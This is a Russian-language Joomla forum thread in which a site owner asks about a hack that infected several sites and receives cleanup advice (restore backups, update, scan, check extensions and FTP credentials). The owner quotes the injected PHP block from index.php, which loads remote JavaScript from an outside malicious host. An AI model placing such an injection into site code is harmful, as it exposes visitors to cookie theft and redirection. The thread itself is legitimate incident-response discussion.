0 Пользователей и 1 Гость просматривают эту тему.
  • 7 Ответов
  • 700 Просмотров
*

ap11

  • Захожу иногда
  • 17
  • 0
  • Разработка сайтов на Joomla!
Есть несколько сайтов на одном хостинге: один из них на Joomla 1.5, другие на Joomla 2.5.4
Произошел взлом какого-то сайта, наверное 1.5, в результате заражены были все сайты.
В файле index.php всех сайтов стоит блок:

Код
<?php
#033761#
if(empty($j)) {
$j = "<script type=\"text/javascript\" src=\"http://ghseif.us/manage/login/6fh1tz6y.php?id=12745\"></script>";
echo $j;
}
#/033761#
?>


если смотреть код сайта в HTML то там просто стоит скрипт в коде:

Код
<script type="text/javascript" src="http://ghseif.us/manage/login/6fh1tz6y.php?id=12745"></script>

Вопрос: в чем смысл этой ссылки в скрипте? она ведь не индексируется поисковиком... или может быть редирект при каких-то условиях..?

И решится проблема, если просто обновить сайты и убрать этот код из index.php?

И еще не совсем понятно ситуация: в корне сайта есть папки с датой изменения как и файла index.php, но в папках нет файлов этой даты, все файлы старые.. это тоже могло быть изменено при взломе?
« Последнее редактирование: 21.06.2015, 00:08:17 от ap11 »
*

zomby6888

  • Живу я здесь
  • 1484
  • 167
Re: Взломана Joomla, непонятный скрипт
« Ответ #1 : 21.06.2015, 00:19:23 »
Цитировать
Вопрос: в чем смысл этой ссылки в скрипте?

В том что произвольный код исполняется на страницах сайта. Он может что угодно делать, воровать пользовательские кукисы и данные,  или перенаправлять пользователей например.
интернет-блог: http://websiteprog.ru
*

ChaosHead

  • Профи
  • 4739
  • 398
Re: Взломана Joomla, непонятный скрипт
« Ответ #2 : 21.06.2015, 00:22:13 »
Проблема решается откатом сайтов из резервной копии и дальнейшим обновлением или поиском уязвимостей.
*

draff

  • Практически профи
  • 2770
  • 171
  • step by step
Re: Взломана Joomla, непонятный скрипт
« Ответ #3 : 21.06.2015, 05:24:37 »
Если Joomla до 1.5.26, и до 2.5.28, то все содержат уязвимость.
Сканер айболит в помощь
*

ap11

  • Захожу иногда
  • 17
  • 0
  • Разработка сайтов на Joomla!
Re: Взломана Joomla, непонятный скрипт
« Ответ #5 : 21.06.2015, 16:08:12 »
спасибо всем за ответы
я так понимаю взлом может быть из-за расширений также
на Joomla 2.5.4 стоят:

компоненты:
Ackeeba Backup
Fox Contact (для Joomla 1.7)
Rockcandy
RokGallery
EasyBook

плагин:
AllVideos

шаблон от Рокетов с Gantry фреймворком. также привлекло внимание, что не во всех php файлах шаблона стоит defined('_JEXEC') or die('Restricted access');  т.е. запрет прямого доступа к файлам

Что из этого опасно?
Мне кажется Fox Contact, т.к. Joomla 1.7, и возможно Ackeeba Backup, т.к. можно выкачать сайт... ну и прямого доступа также не должно быть..
*

ChaosHead

  • Профи
  • 4739
  • 398
Re: Взломана Joomla, непонятный скрипт
« Ответ #6 : 21.06.2015, 19:57:10 »
Взлом ещё может быть от того, что вирус в вашем компьютере украл пароль от ftp
*

winstrool

  • Завсегдатай
  • 770
  • 41
  • Свободен для работы
Re: Взломана Joomla, непонятный скрипт
« Ответ #7 : 22.06.2015, 07:26:40 »
спасибо всем за ответы
я так понимаю взлом может быть из-за расширений также
на Joomla 2.5.4 стоят:

компоненты:
Ackeeba Backup
Fox Contact (для Joomla 1.7)
Rockcandy
RokGallery
EasyBook

плагин:
AllVideos

шаблон от Рокетов с Gantry фреймворком. также привлекло внимание, что не во всех php файлах шаблона стоит defined('_JEXEC') or die('Restricted access');  т.е. запрет прямого доступа к файлам

Что из этого опасно?
Мне кажется Fox Contact, т.к. Joomla 1.7, и возможно Ackeeba Backup, т.к. можно выкачать сайт... ну и прямого доступа также не должно быть..
Конкретно встречался с уязвимостями на Ackeeba Backup, Fox Contact, RokGallery, здается мне если в сторону других капнуть, там тоже всплывет что нить...
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Как исправить уязвимость в Joomla 1.5.26 - libraries/phpmailer/phpmailer.php - RCE : CVE-2016-10045,?

Автор Elimelech

Ответов: 4
Просмотров: 488
Последний ответ 03.09.2017, 16:24:17
от Sorbon
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 99
Просмотров: 46698
Последний ответ 05.07.2017, 15:18:57
от revisium
sql injection for Joomla 3.7

Автор winstrool

Ответов: 5
Просмотров: 302
Последний ответ 22.05.2017, 21:49:11
от Septdir
Взлом Joomla 3

Автор tiberian

Ответов: 1
Просмотров: 266
Последний ответ 31.03.2017, 16:16:50
от SeBun
Совет по Joomla 3.6.5

Автор blackenvy

Ответов: 14
Просмотров: 279
Последний ответ 28.03.2017, 13:53:07
от dmitry_stas